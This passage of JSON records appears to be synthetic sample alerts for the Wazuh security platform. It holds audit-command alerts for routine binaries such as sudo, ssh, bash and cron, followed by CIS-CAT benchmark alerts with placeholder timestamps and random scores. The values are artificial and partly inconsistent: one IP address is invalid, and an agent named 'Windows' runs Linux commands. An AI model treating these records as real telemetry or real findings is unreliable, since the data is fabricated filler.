/usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":3,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ssh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sshd","command":"ssh","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":3,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ssh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sshd","command":"ssh","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":2,"description":"Sample alert 5","id":"4598","mail":false,"groups":["ciscat"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":57,"rule_title":"CIS-CAT 6","notchecked":1,"score":14,"pass":11,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":98,"result":"es"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":10,"description":"Sample alert 4","id":"4044","mail":false,"groups":["ciscat"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":95,"rule_title":"CIS-CAT 6","notchecked":3,"score":23,"pass":6,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":12,"result":"pass"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":5,"description":"Sample alert 3","id":"3932","mail":false,"groups":["ciscat"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":51,"rule_title":"CIS-CAT 2","notchecked":4,"score":72,"pass":39,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":60,"result":"notchecked"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":12,"description":"Sample alert 4","id":"1379","mail":false,"groups":["ciscat"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":100,"rule_title":"CIS-CAT 5","notchecked":2,"score":5,"pass":86,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":9,"result":"pass"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":2,"description":"Sample alert 4","id":"4454","mail":false,"groups":["ciscat"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":0,"rule_title":"CIS-CAT 6","notchecked":4,"score":3,"pass":19,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":65,"result":"pass"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":2,"description":"Sample alert 2","id":"3476","mail":false,"groups":["ciscat"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":0,"rule_title":"CIS-CAT 3","notchecked":0,"score":62,"pass":70,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":75,"result":"es"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":1,"description":"Sample alert 4","id":"1453","mail":false,"groups":["ciscat"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":46,"rule_title":"CIS-CAT 4","notchecked":3,"score":84,"pass":19,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":12,"result":"pass"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":3,"description":"Sample alert 5","id":"1418","mail":false,"groups":["ciscat"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":70,"rule_title":"CIS-CAT 3","notchecked":2,"score":74,"pass":41,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":90,"result":"pass"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":6,"description":"Sample alert 2","id":"2726","mail":false,"groups":["ciscat"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":80,"rule_title":"CIS-CAT 3","notchecked":4,"score":1,"pass":66,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":10,"result":"fail"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":10,"description":"Sample alert 1","id":"4746","mail":false,"groups":["ciscat"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":46,"rule_title":"CIS-CAT 2","notchecked":1,"score":55,"pass":84,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":78,"result":"notchecked"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":4,"description":"Sample alert 5","id":"457","mail":false,"groups":["ciscat"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":15,"rule_title":"CIS-CAT 1","notchecked":5,"score":42,"pass":85,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":27,"result":"notchecked"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":7,"description":"Sample alert 2","id":"3248","mail":false,"groups":["ciscat"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":79,"rule_title":"CIS-CAT 3","notchecked":2,"score":82,"pass":44,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":18,"result":"fail"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":13,"description":"Sample alert 4","id":"5382","mail":false,"groups":["ciscat"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":4,"rule_title":"CIS-CAT 4","notchecked":4,"score":31,"pass":12,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":14,"result":"fail"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":2,"description":"Sample alert 3","id":"4840","mail":false,"groups":["ciscat"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":66,"rule_title":"CIS-CAT 3","notchecked":2,"score":58,"pass":29,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":77,"result":"es"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":13,"description":"Sample alert 3","id":"4569","mail":false,"groups":["ciscat"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":78,"rule_title":"CIS-CAT 6","notchecked":1,"score":79,"pass":1,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":20,"result":"pass"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":13,"description":"Sample alert 1","id":"809","mail":false,"groups":["ciscat"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":21,"rule_title":"CIS-CAT 1","notchecked":3,"score":76,"pass":13,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":47,"result":"fail"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":8,"description":"Sample alert 4","id":"2098","mail":false,"groups":["ciscat"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":16,"rule_title":"CIS-CAT 3","notchecked":1,"score":41,"pass":66,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":16,"result":"notchecked"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":8,"description":"Sample alert 3","id":"2011","mail":false,"groups":["ciscat"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":72,"rule_title":"CIS-CAT 1","notchecked":4,"score":59,"pass":67,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":7,"result":"notchecked"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":8,"description":"Sample alert 5","id":"4506","mail":false,"groups":["ciscat"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Access, Authentication and Authorization","fail":12,"rule_title":"CIS-CAT 4","notchecked":1,"score":99,"pass":38,"timestamp":"{timestamp}","benchmark":"CIS Ubuntu Linux 16.04 LTS Benchmark","unknown":49,"result":"pass"}},"location":""} +{"timestamp":"{timestamp}","rule":{"level":4,"description":"Sample alert 4","id":"1888","mail":false,"groups":["ciscat"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"cis":{"group":"Logging and Auditing","fail":50,"rule_title":"CIS-CAT 